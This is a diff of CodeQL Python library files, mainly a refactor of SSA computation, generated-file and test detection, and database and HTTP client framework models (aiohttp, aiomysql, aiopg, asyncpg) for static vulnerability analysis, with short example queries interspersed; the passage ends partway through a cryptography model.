override string getAPrimaryQlClass() { result = "PyEdgeRefinement" }
}
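
A small sketch of how the new `getAPrimaryQlClass()` predicates might be exercised, assuming the ESSA classes are available from the default `python` import:

import python

// enumerate ESSA definitions together with the name of their primary QL class,
// as introduced by the `getAPrimaryQlClass()` overrides above
from EssaDefinition d
select d, d.getAPrimaryQlClass()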

View File

@@ -90,6 +90,7 @@
*/
import python
private import semmle.python.internal.CachedStages
cached
private module SsaComputeImpl {
@@ -139,7 +140,7 @@ private module SsaComputeImpl {
Liveness::liveAtEntry(v, succ)
}
/** A phi node for `v` at the beginning of basic block `b`. */
/** Holds if there is a phi node for `v` at the beginning of basic block `b`. */
cached
predicate phiNode(SsaSourceVariable v, BasicBlock b) {
(
@@ -175,8 +176,8 @@ private module SsaComputeImpl {
}
/**
* A ranking of the indices `i` at which there is an SSA definition or use of
* `v` in the basic block `b`.
* Holds if the `rankix`th definition or use of the SSA variable `v` in the basic block `b` occurs
* at index `i`.
*
* Basic block indices are translated to rank indices in order to skip
* irrelevant indices at which there is no definition or use when traversing
@@ -187,14 +188,14 @@ private module SsaComputeImpl {
i = rank[rankix](int j | variableDef(v, _, b, j) or variableUse(v, _, b, j))
}
/** A definition of a variable occurring at the specified rank index in basic block `b`. */
/** Holds if there is a definition of a variable occurring at the specified rank index in basic block `b`. */
cached
predicate defRank(SsaSourceVariable v, BasicBlock b, int rankix, int i) {
variableDef(v, _, b, i) and
defUseRank(v, b, rankix, i)
}
/** A variable access `use` of `v` in `b` at index `i`. */
/** Holds if there is a variable access `use` of `v` in `b` at index `i`. */
cached
predicate variableUse(SsaSourceVariable v, ControlFlowNode use, BasicBlock b, int i) {
(v.getAUse() = use or v.hasRefinement(use, _)) and
@@ -205,7 +206,7 @@ private module SsaComputeImpl {
}
/**
* A definition of an SSA variable occurring at the specified position.
* Holds if there is a definition of an SSA variable occurring at the specified position.
* This is either a phi node, a `VariableUpdate`, or a parameter.
*/
cached
@@ -227,7 +228,7 @@ private module SsaComputeImpl {
* dominance.
*/
/** The maximum rank index for the given variable and basic block. */
/** Gets the maximum rank index for the given variable and basic block. */
cached
int lastRank(SsaSourceVariable v, BasicBlock b) {
result = max(int rankix | defUseRank(v, b, rankix, _))
@@ -253,7 +254,7 @@ private module SsaComputeImpl {
i = piIndex()
}
/** The SSA definition reaches the rank index `rankix` in its own basic block `b`. */
/** Holds if the SSA definition reaches the rank index `rankix` in its own basic block `b`. */
cached
predicate ssaDefReachesRank(SsaSourceVariable v, BasicBlock b, int i, int rankix) {
ssaDefRank(v, b, rankix, i)
@@ -264,7 +265,7 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `def` reaches `use` in the same basic block
* Holds if the SSA definition of `v` at `def` reaches `use` in the same basic block
* without crossing another SSA definition of `v`.
*/
cached
@@ -303,11 +304,12 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `def` reaches the end of a basic block `b`, at
* Holds if the SSA definition of `v` at `def` reaches the end of a basic block `b`, at
* which point it is still live, without crossing another SSA definition of `v`.
*/
cached
predicate reachesEndOfBlock(SsaSourceVariable v, BasicBlock defbb, int defindex, BasicBlock b) {
Stages::AST::ref() and
Liveness::liveAtExit(v, b) and
(
defbb = b and
@@ -320,7 +322,7 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `(defbb, defindex)` reaches `use` without crossing another
* Holds if the SSA definition of `v` at `(defbb, defindex)` reaches `use` without crossing another
* SSA definition of `v`.
*/
cached
@@ -360,7 +362,7 @@ private module SsaComputeImpl {
i = rank[rankix](int j | variableDefine(v, _, b, j) or variableSourceUse(v, _, b, j))
}
/** A variable access `use` of `v` in `b` at index `i`. */
/** Holds if there is a variable access `use` of `v` in `b` at index `i`. */
cached
predicate variableSourceUse(SsaSourceVariable v, ControlFlowNode use, BasicBlock b, int i) {
v.getASourceUse() = use and
@@ -494,8 +496,8 @@ private module SsaComputeImpl {
predicate firstUse(EssaDefinition def, ControlFlowNode use) {
exists(SsaSourceVariable v, BasicBlock b1, int i1, BasicBlock b2, int i2 |
adjacentVarRefs(v, b1, i1, b2, i2) and
definesAt(def, v, b1, i1) and
variableSourceUse(v, use, b2, i2)
definesAt(def, pragma[only_bind_into](v), b1, i1) and
variableSourceUse(pragma[only_bind_into](v), use, b2, i2)
)
or
exists(

View File

@@ -4,13 +4,14 @@
*/
import python
private import semmle.python.pointsto.Base
private import semmle.python.internal.CachedStages
cached
module SsaSource {
/** Holds if `v` is used as the receiver in a method call. */
cached
predicate method_call_refinement(Variable v, ControlFlowNode use, CallNode call) {
Stages::AST::ref() and
use = v.getAUse() and
call.getFunction().(AttrNode).getObject() = use and
not test_contains(_, call)

View File

@@ -14,7 +14,7 @@ abstract class GeneratedFile extends File {
* There is no formal reason for the above, it just seems to work well in practice.
*/
library class GenericGeneratedFile extends GeneratedFile {
class GenericGeneratedFile extends GeneratedFile {
GenericGeneratedFile() {
not this instanceof SpecificGeneratedFile and
(
@@ -32,18 +32,26 @@ library class GenericGeneratedFile extends GeneratedFile {
override string getTool() { lax_generated_by(this, result) or strict_generated_by(this, result) }
}
pragma[nomagic]
private int minStmtLine(File file) {
result =
min(int line |
line = any(Stmt s | s.getLocation().getFile() = file).getLocation().getStartLine()
)
}
pragma[nomagic]
private predicate isCommentAfterCode(Comment c, File f) {
f = c.getLocation().getFile() and
minStmtLine(f) < c.getLocation().getStartLine()
}
private string comment_or_docstring(File f, boolean before_code) {
exists(Comment c |
c.getLocation().getFile() = f and
result = c.getText()
|
if
exists(Stmt s |
s.getEnclosingModule().getFile() = f and
s.getLocation().getStartLine() < c.getLocation().getStartLine()
)
then before_code = false
else before_code = true
if isCommentAfterCode(c, f) then before_code = false else before_code = true
)
or
exists(Module m | m.getFile() = f |
@@ -103,7 +111,7 @@ private predicate auto_generated(File f) {
/**
* A file generated by a template engine
*/
abstract library class SpecificGeneratedFile extends GeneratedFile {
abstract class SpecificGeneratedFile extends GeneratedFile {
/*
* Currently cover Spitfire, Pyxl and Mako.
* Django templates are not compiled to Python.
@@ -112,7 +120,7 @@ abstract library class SpecificGeneratedFile extends GeneratedFile {
}
/** File generated by the spitfire templating engine */
/** A file generated by the spitfire templating engine */
class SpitfireGeneratedFile extends SpecificGeneratedFile {
SpitfireGeneratedFile() {
exists(Module m | m.getFile() = this and not m instanceof SpitfireTemplate |
@@ -127,14 +135,14 @@ class SpitfireGeneratedFile extends SpecificGeneratedFile {
override string getTool() { result = "spitfire" }
}
/** File generated by the pyxl templating engine */
/** A file generated by the pyxl templating engine */
class PyxlGeneratedFile extends SpecificGeneratedFile {
PyxlGeneratedFile() { this.getSpecifiedEncoding() = "pyxl" }
override string getTool() { result = "pyxl" }
}
/** File generated by the mako templating engine */
/** A file generated by the mako templating engine */
class MakoGeneratedFile extends SpecificGeneratedFile {
MakoGeneratedFile() {
exists(Module m | m.getFile() = this |
@@ -166,7 +174,7 @@ string from_mako_import(Module m) {
)
}
/** File generated by Google's protobuf tool. */
/** A file generated by Google's protobuf tool. */
class ProtobufGeneratedFile extends SpecificGeneratedFile {
ProtobufGeneratedFile() {
this.getAbsolutePath().regexpMatch(".*_pb2?.py") and
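
A minimal sketch of how the `GeneratedFile` classes above might be queried; the import path `semmle.python.filters.GeneratedCode` is an assumption, since the listing does not show the file name:

import python
import semmle.python.filters.GeneratedCode

// report files that look auto-generated, together with the tool that produced them
from GeneratedFile f
select f, f.getTool()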

View File

@@ -15,7 +15,7 @@ class UnitTestClass extends TestScope {
abstract class Test extends TestScope { }
/** Class of test function that uses the `unittest` framework */
/** A test function that uses the `unittest` framework */
class UnitTestFunction extends Test {
UnitTestFunction() {
this.getScope+() instanceof UnitTestClass and
@@ -37,7 +37,7 @@ class NoseTestFunction extends Test {
}
}
/** Class of functions that are clearly tests, but don't belong to a specific framework */
/** A function that is clearly a test, but doesn't belong to a specific framework */
class UnknownTestFunction extends Test {
UnknownTestFunction() {
this.(Function).getName().matches("test%") and
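
A minimal usage sketch for the test-scope classes above; the import path `semmle.python.filters.Tests` is an assumption, since the listing does not show the file name:

import python
import semmle.python.filters.Tests

// enumerate scopes that the library classifies as tests, regardless of framework
from Test t
select t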

View File

@@ -243,7 +243,9 @@ module AiohttpWebModel {
/** A class that has a super-type which is an aiohttp.web View class. */
class AiohttpViewClassFromSuperClass extends AiohttpViewClass {
AiohttpViewClassFromSuperClass() { this.getABase() = View::subclassRef().getAUse().asExpr() }
AiohttpViewClassFromSuperClass() {
this.getParent() = View::subclassRef().getAnImmediateUse().asExpr()
}
}
/** A class that is used in a route-setup, therefore being considered an aiohttp.web View class. */
@@ -639,3 +641,53 @@ module AiohttpWebModel {
override DataFlow::Node getValueArg() { result = value }
}
}
/**
* Provides models for the client part (`aiohttp.client`) of the `aiohttp` PyPI package.
* See https://docs.aiohttp.org/en/stable/client.html
*/
private module AiohttpClientModel {
/**
* Provides models for the `aiohttp.ClientSession` class
*
* See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession.
*/
module ClientSession {
/** Gets a reference to the `aiohttp.ClientSession` class. */
private API::Node classRef() {
result = API::moduleImport("aiohttp").getMember("ClientSession")
}
/** Gets a reference to an instance of `aiohttp.ClientSession`. */
private API::Node instance() { result = classRef().getReturn() }
/** A method call on a ClientSession that sends off a request */
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
OutgoingRequestCall() {
methodName in [HTTP::httpVerbLower(), "request"] and
this = instance().getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
not methodName = "request" and
result = this.getArg(0)
or
methodName = "request" and
result = this.getArg(1)
}
override string getFramework() { result = "aiohttp.ClientSession" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}
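
The new `OutgoingRequestCall` class feeds the generic `HTTP::Client::Request` concept, so a query can pick up `aiohttp.ClientSession` requests without naming the class directly. A minimal sketch, assuming the concept is available from `semmle.python.Concepts`:

import python
import semmle.python.Concepts
import semmle.python.dataflow.new.DataFlow

// list outgoing aiohttp.ClientSession requests together with the node holding the URL
from HTTP::Client::Request req, DataFlow::Node url
where req.getFramework() = "aiohttp.ClientSession" and url = req.getAUrlPart()
select req, url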

View File

@@ -15,7 +15,7 @@ private module Aiomysql {
private import semmle.python.internal.Awaited
/**
* A `ConectionPool` is created when the result of `aiomysql.create_pool()` is awaited.
* Gets a `ConnectionPool` that is created when the result of `aiomysql.create_pool()` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/pool.html
*/
API::Node connectionPool() {
@@ -23,9 +23,9 @@ private module Aiomysql {
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `aiomysql.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/connection.html#connection
*/
API::Node connection() {
@@ -35,7 +35,7 @@ private module Aiomysql {
}
/**
* A `Cursor` is created when
* Gets a `Cursor` that is created when
* - the result of calling `cursor` on a `ConnectionPool` is awaited.
* - the result of calling `cursor` on a `Connection` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html
@@ -47,45 +47,29 @@ private module Aiomysql {
}
/**
* Calling `execute` on a `Cursor` constructs a query.
* A query. Calling `execute` on a `Cursor` constructs a query.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html#Cursor.execute
*/
class CursorExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorExecuteCall extends SqlConstruction::Range, API::CallNode {
CursorExecuteCall() { this = cursor().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("operation")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "operation").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode cursorExecuteCall(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = cursorExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node cursorExecuteCall(DataFlow::Node sql) {
cursorExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html#Cursor.execute
*/
class AwaitedCursorExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
CursorExecuteCall executeCall;
AwaitedCursorExecuteCall() { this = awaited(cursorExecuteCall(sql)) }
AwaitedCursorExecuteCall() { this = executeCall.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = executeCall.getSql() }
}
/**
* An `Engine` is created when the result of calling `aiomysql.sa.create_engine` is awaited.
* Gets an `Engine` that is created when the result of calling `aiomysql.sa.create_engine` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#engine
*/
API::Node engine() {
@@ -98,48 +82,30 @@ private module Aiomysql {
}
/**
* A `SAConnection` is created when the result of calling `aquire` on an `Engine` is awaited.
* Gets an `SAConnection` that is created when the result of calling `acquire` on an `Engine` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#connection
*/
API::Node saConnection() { result = engine().getMember("acquire").getReturn().getAwaited() }
/**
* Calling `execute` on a `SAConnection` constructs a query.
* A query. Calling `execute` on a `SAConnection` constructs a query.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#aiomysql.sa.SAConnection.execute
*/
class SAConnectionExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class SAConnectionExecuteCall extends SqlConstruction::Range, API::CallNode {
SAConnectionExecuteCall() { this = saConnection().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode saConnectionExecuteCall(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
// saConnection created from engine
t.start() and
sql = result.(SAConnectionExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = saConnectionExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node saConnectionExecuteCall(DataFlow::Node sql) {
saConnectionExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#aiomysql.sa.SAConnection.execute
*/
class AwaitedSAConnectionExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
SAConnectionExecuteCall execute;
AwaitedSAConnectionExecuteCall() { this = awaited(saConnectionExecuteCall(sql)) }
AwaitedSAConnectionExecuteCall() { this = execute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = execute.getSql() }
}
}
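
The rewritten model relies on a single API-graph chain instead of the removed type trackers. The sketch below spells that chain out for the simplest case, a cursor obtained from an awaited `aiomysql.connect(...)` connection; it is an illustration of the pattern, not part of the change:

import python
import semmle.python.ApiGraphs
import semmle.python.dataflow.new.DataFlow

// find `cur.execute(sql)` where `cur` comes from awaiting `conn.cursor()` on a
// connection obtained by awaiting `aiomysql.connect(...)`
from API::CallNode execute, DataFlow::Node sql
where
  execute =
    API::moduleImport("aiomysql")
        .getMember("connect")
        .getReturn()
        .getAwaited()
        .getMember("cursor")
        .getReturn()
        .getAwaited()
        .getMember("execute")
        .getACall() and
  sql = execute.getParameter(0, "operation").getARhs()
select execute, sql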

View File

@@ -15,7 +15,7 @@ private module Aiopg {
private import semmle.python.internal.Awaited
/**
* A `ConectionPool` is created when the result of `aiopg.create_pool()` is awaited.
* Gets a `ConnectionPool` that is created when the result of `aiopg.create_pool()` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#pool
*/
API::Node connectionPool() {
@@ -23,9 +23,9 @@ private module Aiopg {
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `aiopg.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#connection
*/
API::Node connection() {
@@ -35,7 +35,7 @@ private module Aiopg {
}
/**
* A `Cursor` is created when
* Gets a `Cursor` that is created when
* - the result of calling `cursor` on a `ConnectionPool` is awaited.
* - the result of calling `cursor` on a `Connection` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#cursor
@@ -47,45 +47,29 @@ private module Aiopg {
}
/**
* Calling `execute` on a `Cursor` constructs a query.
* A query. Calling `execute` on a `Cursor` constructs a query.
* See https://aiopg.readthedocs.io/en/stable/core.html#aiopg.Cursor.execute
*/
class CursorExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorExecuteCall extends SqlConstruction::Range, API::CallNode {
CursorExecuteCall() { this = cursor().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("operation")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "operation").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode cursorExecuteCall(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = cursorExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node cursorExecuteCall(DataFlow::Node sql) {
cursorExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiopg.readthedocs.io/en/stable/core.html#aiopg.Cursor.execute
*/
class AwaitedCursorExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
CursorExecuteCall execute;
AwaitedCursorExecuteCall() { this = awaited(cursorExecuteCall(sql)) }
AwaitedCursorExecuteCall() { this = execute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = execute.getSql() }
}
/**
* An `Engine` is created when the result of calling `aiopg.sa.create_engine` is awaited.
* Gets an `Engine` that is created when the result of calling `aiopg.sa.create_engine` is awaited.
* See https://aiopg.readthedocs.io/en/stable/sa.html#engine
*/
API::Node engine() {
@@ -94,48 +78,30 @@ private module Aiopg {
}
/**
* A `SAConnection` is created when the result of calling `aquire` on an `Engine` is awaited.
* Gets an `SAConnection` that is created when the result of calling `acquire` on an `Engine` is awaited.
* See https://aiopg.readthedocs.io/en/stable/sa.html#connection
*/
API::Node saConnection() { result = engine().getMember("acquire").getReturn().getAwaited() }
/**
* Calling `execute` on a `SAConnection` constructs a query.
* A query. Calling `execute` on a `SAConnection` constructs a query.
* See https://aiopg.readthedocs.io/en/stable/sa.html#aiopg.sa.SAConnection.execute
*/
class SAConnectionExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class SAConnectionExecuteCall extends SqlConstruction::Range, API::CallNode {
SAConnectionExecuteCall() { this = saConnection().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode saConnectionExecuteCall(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
// saConnection created from engine
t.start() and
sql = result.(SAConnectionExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = saConnectionExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node saConnectionExecuteCall(DataFlow::Node sql) {
saConnectionExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiopg.readthedocs.io/en/stable/sa.html#aiopg.sa.SAConnection.execute
*/
class AwaitedSAConnectionExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
SAConnectionExecuteCall execute;
AwaitedSAConnectionExecuteCall() { this = awaited(saConnectionExecuteCall(sql)) }
AwaitedSAConnectionExecuteCall() { this = execute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = execute.getSql() }
}
}
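
The `aiopg` model follows the same shape as the `aiomysql` one; for variety, the sketch below spells out the `Engine` and `SAConnection` chain used by `SAConnectionExecuteCall`, under the assumption that the engine comes from awaiting `aiopg.sa.create_engine(...)` as documented above:

import python
import semmle.python.ApiGraphs
import semmle.python.dataflow.new.DataFlow

// find `conn.execute(query)` on an SAConnection acquired from an aiopg.sa engine
from API::CallNode execute, DataFlow::Node sql
where
  execute =
    API::moduleImport("aiopg")
        .getMember("sa")
        .getMember("create_engine")
        .getReturn()
        .getAwaited()
        .getMember("acquire")
        .getReturn()
        .getAwaited()
        .getMember("execute")
        .getACall() and
  sql = execute.getParameter(0, "query").getARhs()
select execute, sql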

View File

@@ -12,15 +12,15 @@ private import semmle.python.ApiGraphs
private module Asyncpg {
private import semmle.python.internal.Awaited
/** A `ConectionPool` is created when the result of `asyncpg.create_pool()` is awaited. */
/** Gets a `ConnectionPool` that is created when the result of `asyncpg.create_pool()` is awaited. */
API::Node connectionPool() {
result = API::moduleImport("asyncpg").getMember("create_pool").getReturn().getAwaited()
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `asyncpg.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
*/
API::Node connection() {
result = API::moduleImport("asyncpg").getMember("connect").getReturn().getAwaited()
@@ -33,8 +33,8 @@ private module Asyncpg {
string methodName;
SqlExecutionOnConnection() {
methodName in ["copy_from_query", "execute", "fetch", "fetchrow", "fetchval", "executemany"] and
this.calls([connectionPool().getAUse(), connection().getAUse()], methodName)
this = [connectionPool(), connection()].getMember(methodName).getACall() and
methodName in ["copy_from_query", "execute", "fetch", "fetchrow", "fetchval", "executemany"]
}
override DataFlow::Node getSql() {
@@ -46,13 +46,13 @@ private module Asyncpg {
}
}
/** `Connection`s and `ConnectionPool`s provide some methods that access the file system. */
/** A model of `Connection` and `ConnectionPool`, which provide some methods that access the file system. */
class FileAccessOnConnection extends FileSystemAccess::Range, DataFlow::MethodCallNode {
string methodName;
FileAccessOnConnection() {
methodName in ["copy_from_query", "copy_from_table", "copy_to_table"] and
this.calls([connectionPool().getAUse(), connection().getAUse()], methodName)
this = [connectionPool(), connection()].getMember(methodName).getACall() and
methodName in ["copy_from_query", "copy_from_table", "copy_to_table"]
}
// The path argument is keyword only.
@@ -69,50 +69,29 @@ private module Asyncpg {
* Provides models of the `PreparedStatement` class in `asyncpg`.
* `PreparedStatement`s are created when the result of calling `prepare(query)` on a connection is awaited.
* The result of calling `prepare(query)` is a `PreparedStatementFactory` and the argument, `query` needs to
* be tracked to the place where a `PreparedStatement` is created and then futher to any executing methods.
* be tracked to the place where a `PreparedStatement` is created and then further to any executing methods.
* Hence the two type trackers.
*
* TODO: Rewrite this, once we have `API::CallNode` available.
*/
module PreparedStatement {
class PreparedStatementConstruction extends SqlConstruction::Range, DataFlow::CallCfgNode {
class PreparedStatementConstruction extends SqlConstruction::Range, API::CallNode {
PreparedStatementConstruction() { this = connection().getMember("prepare").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
private DataFlow::TypeTrackingNode preparedStatementFactory(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
t.start() and
sql = result.(PreparedStatementConstruction).getSql()
or
exists(DataFlow::TypeTracker t2 | result = preparedStatementFactory(t2, sql).track(t2, t))
}
DataFlow::Node preparedStatementFactory(DataFlow::Node sql) {
preparedStatementFactory(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
private DataFlow::TypeTrackingNode preparedStatement(DataFlow::TypeTracker t, DataFlow::Node sql) {
t.start() and
result = awaited(preparedStatementFactory(sql))
or
exists(DataFlow::TypeTracker t2 | result = preparedStatement(t2, sql).track(t2, t))
}
DataFlow::Node preparedStatement(DataFlow::Node sql) {
preparedStatement(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
class PreparedStatementExecution extends SqlExecution::Range, DataFlow::MethodCallNode {
DataFlow::Node sql;
class PreparedStatementExecution extends SqlExecution::Range, API::CallNode {
PreparedStatementConstruction prepareCall;
PreparedStatementExecution() {
this.calls(preparedStatement(sql), ["executemany", "fetch", "fetchrow", "fetchval"])
this =
prepareCall
.getReturn()
.getAwaited()
.getMember(["executemany", "fetch", "fetchrow", "fetchval"])
.getACall()
}
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = prepareCall.getSql() }
}
}
@@ -124,37 +103,36 @@ private module Asyncpg {
* The result of calling `cursor` in either case is a `CursorFactory` and the argument, `query` needs to
* be tracked to the place where a `Cursor` is created, hence the type tracker.
* The creation of the `Cursor` executes the query.
*
* TODO: Rewrite this, once we have `API::CallNode` available.
*/
module Cursor {
class CursorConstruction extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorConstruction extends SqlConstruction::Range, API::CallNode {
CursorConstruction() { this = connection().getMember("cursor").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
}
private DataFlow::TypeTrackingNode cursorFactory(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorConstruction).getSql()
or
// cursor created from prepared statement
t.start() and
result.(DataFlow::MethodCallNode).calls(PreparedStatement::preparedStatement(sql), "cursor")
or
exists(DataFlow::TypeTracker t2 | result = cursorFactory(t2, sql).track(t2, t))
}
DataFlow::Node cursorFactory(DataFlow::Node sql) {
cursorFactory(DataFlow::TypeTracker::end(), sql).flowsTo(result)
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/** The creation of a `Cursor` executes the associated query. */
class CursorCreation extends SqlExecution::Range {
DataFlow::Node sql;
CursorCreation() { this = awaited(cursorFactory(sql)) }
CursorCreation() {
exists(CursorConstruction c |
sql = c.getSql() and
this = c.getReturn().getAwaited().getAnImmediateUse()
)
or
exists(PreparedStatement::PreparedStatementConstruction prepareCall |
sql = prepareCall.getSql() and
this =
prepareCall
.getReturn()
.getAwaited()
.getMember("cursor")
.getReturn()
.getAwaited()
.getAnImmediateUse()
)
}
override DataFlow::Node getSql() { result = sql }
}
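
A standalone sketch of the prepared-statement chain used above: the query string is the first argument of `conn.prepare(...)`, and execution happens on the awaited result of that call. The sketch only covers connections from `asyncpg.connect(...)`, one of the two connection sources modelled here:

import python
import semmle.python.ApiGraphs
import semmle.python.dataflow.new.DataFlow

// recover the query string of `stmt.fetch(...)` (and friends) where `stmt`
// is the awaited result of `conn.prepare(sql)`
from API::CallNode prepare, API::CallNode run, DataFlow::Node sql
where
  prepare =
    API::moduleImport("asyncpg")
        .getMember("connect")
        .getReturn()
        .getAwaited()
        .getMember("prepare")
        .getACall() and
  sql = prepare.getParameter(0, "query").getARhs() and
  run =
    prepare
        .getReturn()
        .getAwaited()
        .getMember(["executemany", "fetch", "fetchrow", "fetchval"])
        .getACall()
select run, sql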

View File

@@ -20,7 +20,7 @@ private import semmle.python.frameworks.PEP249
*/
module ClickhouseDriver {
/**
* `clickhouse_driver` implements PEP249,
* A model of `clickhouse-driver`, which implements PEP249,
* providing ways to execute SQL statements against a database.
*/
class ClickHouseDriverPEP249 extends PEP249::PEP249ModuleApiNode {

View File

@@ -22,7 +22,7 @@ private module CryptographyModel {
* Gets a predefined curve class from
* `cryptography.hazmat.primitives.asymmetric.ec` with a specific key size (in bits).
*/
private API::Node predefinedCurveClass(int keySize) {
API::Node predefinedCurveClass(int keySize) {
exists(string curveName |
result =
API::moduleImport("cryptography")
@@ -73,41 +73,6 @@ private module CryptographyModel {
curveName = "BrainpoolP512R1" and keySize = 512
)
}
/** Gets a reference to a predefined curve class with a specific key size (in bits), as well as the origin of the class. */
private DataFlow::TypeTrackingNode curveClassWithKeySize(
DataFlow::TypeTracker t, int keySize, DataFlow::Node origin
) {
t.start() and
result = predefinedCurveClass(keySize).getAnImmediateUse() and
origin = result
or
exists(DataFlow::TypeTracker t2 |
result = curveClassWithKeySize(t2, keySize, origin).track(t2, t)
)
}
/** Gets a reference to a predefined curve class with a specific key size (in bits), as well as the origin of the class. */
DataFlow::Node curveClassWithKeySize(int keySize, DataFlow::Node origin) {
curveClassWithKeySize(DataFlow::TypeTracker::end(), keySize, origin).flowsTo(result)
}
/** Gets a reference to a predefined curve class instance with a specific key size (in bits), as well as the origin of the class. */
private DataFlow::TypeTrackingNode curveClassInstanceWithKeySize(
DataFlow::TypeTracker t, int keySize, DataFlow::Node origin
) {
t.start() and
result.(DataFlow::CallCfgNode).getFunction() = curveClassWithKeySize(keySize, origin)
or
exists(DataFlow::TypeTracker t2 |
result = curveClassInstanceWithKeySize(t2, keySize, origin).track(t2, t)
)
}
/** Gets a reference to a predefined curve class instance with a specific key size (in bits), as well as the origin of the class. */
DataFlow::Node curveClassInstanceWithKeySize(int keySize, DataFlow::Node origin) {
